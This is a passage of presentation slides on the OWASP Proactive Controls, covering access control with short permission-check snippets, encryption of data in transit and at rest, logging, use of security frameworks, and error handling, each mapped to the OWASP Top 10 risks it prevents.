  • 35. C6: Best Practices • Deny by default • Least privilege • Force all requests to go through access control checks • Check on the server when each function is accessed 35
  • 36. C6: Role vs Resource based ACLs Resource based if (user.isPermitted("project:view:123")) { //show the project report button } else { //don't show the button } 36 Role based if (user.hasRole("Project Manager") ) { //show the project report button } else { //don't show the button } if (user.hasRole("Project Manager") || user.hasRole("Admin") ) { //show the project report button } else { //don't show the button }
  • 37. 37 Proactive Control Risks prevented C6: Implement Appropriate Access Controls A4. Insecure Direct Object References A7. Missing Function Level Access Control
  • 39. C7 Controls: Data in transit Data in transit: HTTPS • Confidentiality: Spy cannot view your data • Integrity: Spy cannot change your data • Authenticity: Server you visit is the right one 39 MITM Protection - HSTS • HTTPS + Strict Transport Security Header
  • 40. C7 Controls: Data at rest 1. Algorithm •AES (Advanced Encryption Standard ) 2. Secure key management 3. Adequate access controls and auditing 40
  • 41. 41 Proactive Control Risks prevented C7: Protect Data A6. Sensitive Data Exposure
  • 42. New Website 42 C1 Verify for Security Early and Often C3 Encode Data C4 Validate Input C6 Access Controls C5 Authentication C7 Protect Data C2 Parametrize Queries
  • 43. C8. Implement Logging and Intrusion Detection 43
  • 44. 44 Proactive Control Risks prevented C8.Logging and Intrusion Detection All OWASP Top 10 Risks!
  • 45. C9. Leverage Security Frameworks and Libraries 45
  • 46. C9: Examples • Framework with CSRF protection • Framework with XSS protection • ORM - SQL injection prevention • Vetted Cryptographic algorithm 46
  • 47. C9: Best Practices  Use trusted sources  Low-coupling (Low-coupling == reduced attack surface)  Update regularly / replace 47
  • 48. 48 Proactive Control Risks prevented C9. Leverage Security All OWASP Top 10 Risks!
  • 49. C10. Error and Exception Handling 49
  • 50. C10: Best Practices  Centralised error handling  Verbose enough to explain the issue  Don’t leak critical information 50
  • 51. 51 Proactive Control Risks prevented C10. Error and Exception Handling All OWASP Top 10 Risks!
  • 52. New Website 52 C1 Verify for Security Early and Often C3 Encode Data C4 Validate Input C6 Access Controls C5 Authentication C7 Protect Data C10 Error Handling C8 Logging C2 Parametrize Queries C9 Leverage security
  • 53. It’s a Start To Secure Software by Default! 53
  • 54. Reference OWASP Proactive Controls Project: https://www.owasp.org/index.php/OWASP _Proactive_Controls 54